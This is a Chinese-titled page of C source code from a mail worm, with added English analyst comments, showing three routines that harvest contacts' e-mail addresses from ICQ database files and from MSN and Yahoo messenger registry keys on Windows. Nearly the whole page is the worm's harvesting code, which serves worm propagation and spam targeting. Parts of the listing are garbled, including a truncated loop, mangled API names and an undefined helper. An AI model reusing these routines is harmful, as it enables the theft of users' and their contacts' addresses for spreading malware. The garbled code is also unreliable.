naoga

病毒的e-mail地址收集方法源代码

一、ICQ的e-mail地址收集
/*
 * find_icq_address - address-harvesting routine from a mail-worm listing (ICQ part).
 *
 * What the visible code does, in order:
 *   1. Opens HKCU\Software\Mirabilis\ICQ\DefaultPrefs and reads the "UIN Dir"
 *      and "ICQPath" values.
 *   2. Changes the working directory to "UIN Dir", takes the first "*.uin"
 *      file name found there and rewrites its last three characters to "dat".
 *   3. Looks for that .dat name under ICQPath in the sub-directories
 *      2000b, 2001a, 2001b, 2002a, 2002b and keeps the first one that exists.
 *   4. Opens and memory-maps that file read-only and scans it for the marker
 *      "PrimaryEmail", copying the text that follows into a local array.
 *
 * Nothing is returned and the collected array is local; this listing does not
 * show any further use of it.
 *
 * Analyst notes:
 *   - Observable artifacts are the registry read of the key above and a
 *     read-only mapping of the ICQ .dat database by a process other than ICQ.
 *     The key is opened with KEY_ALL_ACCESS although it is only read.
 *   - The listing is mangled as published (identifier case such as
 *     RegQueryvalueEx / INVALID_HANDLE_value, and a truncated loop header),
 *     so it does not compile as shown. It is reproduced unchanged.
 *   - validAddress() is not defined in this listing.
 */
void find_icq_address()
{
HANDLE hF1;
WIN32_FIND_DATA f;
HANDLE hFind;
BYTE uin[MAX_PATH],dbpath[MAX_PATH];
DWORD size;
HKEY hkeyresult;
char datafname[MAX_PATH], fn[50];size=800;
/* Step 1: locate the ICQ installation through the per-user registry hive. */
LONG l1=RegOpenKeyEx(HKEY_CURRENT_USER, ( LPCTSTR )"Software\\Mirabilis\\ICQ\\DefaultPrefs" ,0,KEY_ALL_ACCESS, &hkeyresult );
if(l1!=ERROR_SUCCESS) return ;
/* Return codes of both queries are ignored; size is passed as 800 for MAX_PATH-sized buffers. */
RegQueryvalueEx ( hkeyresult, ( LPCTSTR )"UIN Dir" , 0, 0, uin, &size ) ;size=800;
RegQueryvalueEx ( hkeyresult, ( LPCTSTR )"ICQPath" , 0, 0, dbpath, &size ) ;
RegCloseKey(hkeyresult);
/* Step 2: derive the database file name from the first *.uin file in "UIN Dir". */
SetCurrentDirectory((char *)uin);
hFind = FindFirstFile("*.uin", &f);
if (hFind == INVALID_HANDLE_value){ FindClose(hFind); return ;}
FindClose(hFind);
strcpy(fn,f.cFileName );
/* Replace the three-character extension in place: "uin" -> "dat". */
fn[lstrlen(fn)-3]='d';fn[lstrlen(fn)-2]='a';fn[lstrlen(fn)-1]='t';
/* Make sure ICQPath ends with a backslash before appending to it. */
if(!(dbpath[lstrlen((char *)dbpath)-1]=='\\')) lstrcat((char *)dbpath,"\\");
/* Step 3: probe the five listed sub-directories; first hit wins. */
char *pb[6]={"2000b","2001a","2001b","2002a","2002b",};
for (int cc=0;cc<5;cc++){
wsprintf(datafname,"%s%s\\%s",(char *)dbpath,pb[cc],fn);
hFind = FindFirstFile(datafname, &f);
if (hFind != INVALID_HANDLE_value){ FindClose(hFind); goto RR; }
FindClose(hFind);
}
/* No database file found in any of the probed directories. */
return;
RR:
/* Step 4: map the database read-only and scan it. */
char eid[3000][50];int cnt=0;
/* NOTE(review): CreateFile reports failure with INVALID_HANDLE_VALUE, so the NULL test below does not detect it. */
hF1= CreateFile (datafname,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if (hF1==NULL) return ;
size=GetFileSize(hF1,NULL);
char *buffer=NULL;
HANDLE hFMAP=CreateFileMapping(hF1,0,PAGE_READONLY,0,0,0);
if(!hFMAP) { CloseHandle(hF1); return ; }
buffer=(char *)MapViewOfFile(hFMAP,FILE_MAP_READ,0,0,0);
if(!buffer) { CloseHandle(hFMAP); CloseHandle(hF1); return ; }
char eID[250];eID[0]=0;DWORD i=0;
/* The loop header below is truncated in the published listing; left as found. */
while(i{
if(!strncmp(buffer+i,"PrimaryEmail",strlen("PrimaryEmail"))) {
/* Skips 16 bytes from the start of the marker; presumably the marker plus a short field header (unconfirmed). */
i+=16;
/* The string is kept when validAddress() returns 0; its contract is not visible here. */
if(!validAddress(buffer+i )){ lstrcpy(eid[cnt],buffer+i);cnt++; }
}
else i++;
}

UnmapViewOfFile(buffer);
CloseHandle (hFMAP);
CloseHandle (hF1);
// eid[i] now holds the collected e-mail addresses
// (original author's sign-off)
return ;
}

二、.net MSN的e-mail地址收集
/*
 * find_msn_address - address-harvesting routine from a mail-worm listing (MSN part).
 *
 * Opens HKCU\Software\Microsoft\MessengerService\ListCache\.NET Messenger Service,
 * enumerates its values by index and passes each value's data to validAddress().
 * Data for which validAddress() returns 0 is copied into a local array.
 * Nothing is returned; this listing does not show any use of the array.
 *
 * Analyst notes:
 *   - The observable artifact is enumeration of the ListCache key above by a
 *     process other than the messenger client. The key is opened with
 *     KEY_ALL_ACCESS although it is only read.
 *   - RegEnumvalue is spelled as in the published listing (case-mangled).
 *   - validAddress() is not defined in this listing.
 */
void find_msn_address()
{
char eid[1500][50];
HKEY hkeyresult1;
char name[250];
BYTE dat[250];
DWORD dw,dw1;
LONG l1,k;
int cnt=0;
l1=RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\MessengerService\\ListCache\\.NET Messenger Service",0,KEY_ALL_ACCESS, &hkeyresult1 );
if(l1==ERROR_SUCCESS){
/* dw and dw1 are assigned twice; only the second pair (100, REG_BINARY) is in effect. */
dw=300;
dw1=REG_BINARY;
k=0;
dw=100;
dw1=REG_BINARY;
l1=ERROR_SUCCESS;
/* Walk the values by index until the API reports the end of the list. */
while(l1!=ERROR_NO_MORE_ITEMS){
/* The same variable dw is passed as both the name-length and the data-length argument and is not reset between iterations. */
l1=RegEnumvalue(hkeyresult1,k,name,&dw,0,&dw1,dat,&dw);
k++;
/* dat is examined whatever l1 was, including after the final failing call. */
if(!validAddress((char *)dat)){
lstrcpy(eid[cnt],(char *)dat);
cnt++;
}
}
}
/* Runs even when the open above failed and hkeyresult1 was never set. */
RegCloseKey(hkeyresult1);
// eid[i] now holds the collected e-mail addresses
// (original author's placeholder; the listing does nothing further with eid)
}

三、yahoo online软件的e-mail地址收集
/*
 * find_yahoo_address - address-harvesting routine from a mail-worm listing (Yahoo part).
 *
 * Enumerates the sub-keys of HKCU\Software\Yahoo\Pager\profiles (one per
 * profile name). For each profile it opens
 * ...\profiles\<name>\IMVironments\Recent and enumerates the value names.
 * Each value name is cut at its first ';'. If the remainder differs from the
 * profile name, "@yahoo.com" is appended and the result is passed to
 * validAddress(). Strings for which it returns 0 are added to the list box
 * IDC_LIST2 of the dialog hd.
 *
 * Analyst notes:
 *   - Unlike the other two routines in this listing, the addresses here are
 *     synthesised from contact IDs and not read verbatim from storage.
 *   - The observable artifact is enumeration of the profiles key and its
 *     IMVironments\Recent sub-keys by a process other than the messenger
 *     client. Both opens request KEY_ALL_ACCESS although the keys are only read.
 *   - hd, IDC_LIST2 and validAddress() are defined outside this listing.
 *   - RegEnumvalue is spelled as in the published listing (case-mangled).
 */
void find_yahoo_address()
{
HKEY hkeyresult ,hkeyresult1;long i;char name[200],skey[100],chatn[200];
DWORD dw2,dw;FILETIME f;
if(RegOpenKeyEx(HKEY_CURRENT_USER, ( LPCTSTR )"Software\\Yahoo\\Pager\\profiles",0,KEY_ALL_ACCESS, &hkeyresult1 )!= ERROR_SUCCESS )
return ;
dw2=200;i=0;int j;
/* Outer loop: one iteration per profile sub-key. */
while(RegEnumKeyEx(hkeyresult1,i,name,&dw2,NULL,NULL,NULL,&f)!=ERROR_NO_MORE_ITEMS){
wsprintf(skey,"Software\\Yahoo\\Pager\\profiles\\%s\\IMVironments\\Recent",name);
if(RegOpenKeyEx(HKEY_CURRENT_USER, ( LPCTSTR )skey,0,KEY_ALL_ACCESS, &hkeyresult )!= ERROR_SUCCESS )
{
/* Aborts the whole routine on the first profile without this sub-key; hkeyresult1 is not closed on this path. */
return ;
}
dw=200;j=0;
/* Inner loop: value names only; the data arguments are NULL. */
while(RegEnumvalue(hkeyresult,j,chatn,&dw,NULL,NULL,NULL,NULL)!=ERROR_NO_MORE_ITEMS)
{
/* Cuts the name at the first ';'. The strchr result is dereferenced without a NULL check. */
*(strchr(chatn,';'))='\0';
/* Skip the entry that matches the profile's own name. */
if (strcmp(chatn,name)!=0){
lstrcat(chatn,"@yahoo.com");
if(!validAddress(chatn))
SendDlgItemMessage(hd,IDC_LIST2,LB_ADDSTRING,0,(LPARAM)chatn);
}
/* Reset the in/out length before the next enumeration call. */
j++;dw=200;
}
RegCloseKey(hkeyresult);
i++;dw2=200;
}
RegCloseKey(hkeyresult1);
// (original author's sign-off)
// (original author's sign-off)
}   
